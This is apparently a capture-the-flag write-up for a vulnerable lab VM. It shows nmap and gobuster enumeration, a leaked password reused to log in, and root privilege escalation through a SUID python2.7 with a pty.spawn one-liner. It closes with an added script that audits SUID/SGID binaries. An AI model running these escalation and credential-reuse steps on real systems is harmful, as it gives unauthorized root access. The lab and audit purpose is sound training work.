AdminNoobMachine
IP: 10.0.0.13
Enumeration
# nmap -sC -sV -v -Pn 10.0.0.13
..............................
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA)
| 2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA)
|_ 256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Hacker Secutiry
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 34602/udp status
| 100024 1 36685/udp6 status
| 100024 1 51734/tcp status
|_ 100024 1 54568/tcp6 status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
# gobuster dir -e -u http://10.0.0.13 -w /usr/share/dirb/wordlists/big.txt
===============================================================
http://10.0.0.13/.htaccess (Status: 403) [Size: 293]
http://10.0.0.13/.htpasswd (Status: 403) [Size: 293]
http://10.0.0.13/LICENSE (Status: 200) [Size: 1093]
http://10.0.0.13/admin (Status: 301) [Size: 306] [--> http://10.0.0.13/admin/]
http://10.0.0.13/css (Status: 301) [Size: 304] [--> http://10.0.0.13/css/]
http://10.0.0.13/img (Status: 301) [Size: 304] [--> http://10.0.0.13/img/]
http://10.0.0.13/js (Status: 301) [Size: 303] [--> http://10.0.0.13/js/]
http://10.0.0.13/mail (Status: 301) [Size: 305] [--> http://10.0.0.13/mail/]
http://10.0.0.13/manual (Status: 301) [Size: 307] [--> http://10.0.0.13/manual/]
http://10.0.0.13/server-status (Status: 403) [Size: 297]
http://10.0.0.13/vendor (Status: 301) [Size: 307] [--> http://10.0.0.13/vendor/]
The /admin/ directory holds a note at http://10.0.0.13/admin/temp.txt, which reads (translated from Portuguese):
Notes: I need to change my password hsecpwd123, I've been using it for a long time.
The Exploitation section below starts from a shell as the local user hsec, so this reused password is evidently what gets us onto the box (SSH is listening on port 22).
Exploitation
hsec@noob1:~$ id
uid=1000(hsec) gid=1000(hsec) groups=1000(hsec)
hsec@noob1:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description: Debian GNU/Linux 8.10 (jessie)
Release: 8.10
Codename: jessie
hsec@noob1:~$ uname -a
Linux noob1 3.16.0-4-586 #1 Debian 3.16.51-3 (2017-12-13) i686 GNU/Linux
So this is Debian 8.10 (jessie) on kernel 3.16.0-4 (i686).
Post-Exploitation
Let's look for binaries that run with root privileges, i.e. files with the SUID or SGID bit set. A caveat on the command below: in find, -o binds more loosely than the implied -a between the other tests, so the -exec only applies to the -perm -4000 branch and only SUID files are actually printed; wrap the two -perm tests in \( ... \) to list SGID files as well, and put -maxdepth before the tests to silence the option-ordering warning.
hsec@noob1:/$ find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
-rwsr-xr-x 1 root root 96760 Aug 13 2014 /sbin/mount.nfs
-rwsr-xr-x 1 root root 1085300 Feb 10 2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 78072 May 17 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 38740 May 17 2017 /usr/bin/newgrp
-rwsrwxrwx 1 root root 3889608 Aug 13 2016 /usr/bin/python2.7
-rwsr-xr-x 1 root root 43576 May 17 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 106908 Mar 23 2012 /usr/bin/mawk
-rwsr-xr-x 1 root root 52344 May 17 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 53112 May 17 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 38868 May 17 2017 /bin/su
-rwsr-xr-x 1 root root 26344 Mar 29 2015 /bin/umount
-rwsr-xr-x 1 root root 34684 Mar 29 2015 /bin/mount
Note that /usr/bin/python2.7 is SUID root and, with mode rwsrwxrwx, world-writable on top of that (any user could simply overwrite it). Either way, getting root takes nothing more than:
hsec@noob1:/$ python -c "import pty; pty.spawn(\"/bin/sh\")"
# id
uid=1000(hsec) gid=1000(hsec) euid=0(root) groups=1000(hsec)
Note the result: euid is 0 but the real uid is still 1000. That is enough for most purposes (dash, which is /bin/sh on Debian, keeps the effective uid; bash would drop it unless started with -p), but anything that checks the real uid or calls setuid(getuid()) will still treat us as hsec. Having python call setuid(0) before spawning the shell gives a process that is root by both uids.
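As an added example (not code from the original write-up), here is an audit script that does what the find step above was after, in a reusable form: walk the tree to a given depth, report every regular file with the SUID or SGID bit set, skip symlinks, and flag two things the listing makes relevant: a privileged binary that is group- or world-writable (as /usr/bin/python2.7 is here, mode 4777) and one that is not SUID on a stock Debian install at all (python2.7 and mawk). The baseline set of expected SUID binaries and the sample tree the script builds in a temporary directory are constructed for illustration and are assumptions of this example, not data from the box.

```python
#!/usr/bin/env python3
"""Audit a filesystem tree for SUID/SGID binaries and flag the ones worth a second look.

Added example: reproduces the intent of `find / -perm ...` (SUID *or* SGID, symlinks
skipped, depth-limited) and adds two checks: is the privileged binary writable by
group/others, and is it one you would expect to be SUID on a stock Debian at all.
"""
import os
import stat
import tempfile

# Illustrative baseline of binaries that are SUID on a stock Debian 8 install.
# Assumption for this example; adjust per distribution and release.
BASELINE_SUID = frozenset({
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/ping6",
    "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd",
    "/usr/bin/newgrp", "/usr/bin/sudo", "/usr/lib/openssh/ssh-keysign",
    "/sbin/mount.nfs", "/usr/sbin/exim4",
})


def classify(virtual_path, st, baseline=BASELINE_SUID):
    """Return the tags for one file given its lstat() result, or [] if it is not SUID/SGID."""
    mode = st.st_mode
    if not (mode & (stat.S_ISUID | stat.S_ISGID)):
        return []
    tags = []
    if mode & stat.S_ISUID:
        tags.append("suid")
        if virtual_path not in baseline:
            tags.append("unexpected")      # not SUID on a stock install: why is it here?
    if mode & stat.S_ISGID:
        tags.append("sgid")
    if mode & stat.S_IWGRP:
        tags.append("group-writable")
    if mode & stat.S_IWOTH:
        tags.append("world-writable")      # anyone can replace code that runs privileged
    return tags


def audit(root, max_depth=3, baseline=BASELINE_SUID):
    """Walk `root` up to `max_depth` levels (find -maxdepth semantics) and return
    {virtual_path: [tags]} for every regular SUID/SGID file. `virtual_path` is the
    path relative to `root` written as an absolute path, so a tree built under a
    temp dir is compared against the baseline as if it were the real filesystem."""
    findings = {}
    for dirpath, dirnames, filenames in os.walk(root):   # unreadable dirs are skipped
        rel = os.path.relpath(dirpath, root)
        dir_depth = 0 if rel == "." else rel.count(os.sep) + 1
        if dir_depth >= max_depth:           # files here would be deeper than max_depth
            dirnames[:] = []
            continue
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):  # skips symlinks such as /usr/bin/python -> python2.7
                continue
            virtual = "/" + os.path.relpath(full, root).replace(os.sep, "/")
            tags = classify(virtual, st, baseline)
            if tags:
                findings[virtual] = tags
    return findings


def build_sample_tree(base):
    """Constructed sample mirroring the listing from the box: standard SUID binaries,
    a world-writable SUID python2.7, a SUID mawk, an SGID wall, a plain binary,
    a file beyond the depth limit, and a symlink that must be skipped."""
    layout = {
        "bin/su": 0o4755, "bin/mount": 0o4755, "usr/bin/passwd": 0o4755,
        "usr/bin/python2.7": 0o4777, "usr/bin/mawk": 0o4755,
        "usr/bin/wall": 0o2755,            # SGID on Debian
        "usr/bin/ls": 0o755,               # ordinary binary, must not be reported
        "usr/lib/x/y/z/deep": 0o4755,      # deeper than max_depth=3, must not be reported
    }
    for rel, mode in layout.items():
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(b"#!/bin/sh\n")
        os.chmod(path, mode)               # chmod after writing: a write would clear the SUID bit
    os.symlink("python2.7", os.path.join(base, "usr/bin/python"))


def run_demo():
    """Build the sample tree in a temp dir, audit it and return the findings."""
    with tempfile.TemporaryDirectory() as base:
        build_sample_tree(base)
        return audit(base)


if __name__ == "__main__":
    for path, tags in sorted(run_demo().items()):
        print(f"{path:<24} {' '.join(tags)}")
```

Run it as a script to see the report for the sample tree; on a real host call audit("/") as the unprivileged user you landed as, the way you would during post-exploitation. Directories you cannot read are simply skipped, and "unexpected" plus "world-writable" on the same line is exactly the combination that made this box trivial.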